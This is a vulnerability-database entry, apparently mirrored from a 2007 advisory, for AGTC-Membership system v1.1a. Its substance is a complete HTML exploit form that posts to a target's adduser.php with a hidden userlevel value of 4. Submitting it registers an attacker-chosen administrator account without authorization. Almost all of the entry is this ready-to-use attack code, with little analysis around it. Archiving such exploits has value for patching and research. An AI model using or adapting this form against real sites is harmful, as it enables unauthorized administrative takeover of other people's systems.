AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit
User Name:AGTC-Membership system v1.1a (adduser) Remote Add Ad... - vulnerability database | Vulners.comAGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit
User Name:AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit
User Name:AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit
User Name:
Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18305
HistoryOct 29, 2007 - 12:00 a.m.

AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit

2007-10-2900:00:00
vulners.com
8
JSON

<!–

  • Product : AGTC-Membership system
  • Version : 1.1a
  • Website : http://www.agtc.co.uk
  • Author : 0x90
  • HomePage : WwW.0x90.CoM.Ar
  • Contact : Guns[at]0x90[dot]com[dot]ar
  • Problem : Admin Added Access.
    –>

<form name="form1" method="post" action="http://[target]/adduser.php">
<h3 align="center">AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit</h3>
<table width="40%" border="1" align="center" bordercolor="#000000">
<tr>
<td width="20%"><div align="right"><strong>User Name:</strong></div></td>
<td width="40%"><input name="username" type="text" id="username" value="" maxlength="15"></td>
</tr>
<tr>
<td><div align="right"><strong>Password:</strong></div></td>
<td><input name="userpass" type="password" id="userpass" value="" maxlength="15"></td>
</tr>
<tr>
<td><div align="right"><strong>Email Address:</strong></div></td>
<td><input name="useremail" type="text" id="useremail" value="" maxlength"25"></td>
</tr>
<input name="userlevel" type="hidden" id="userlevel" value="4">
<tr>
<td>&nbsp;</td>
<td><input type="submit" name="Submit" value="Add User">
<input type="reset" name="Submit2" value="Reset"></form></td>
</tr>
</table>

JSON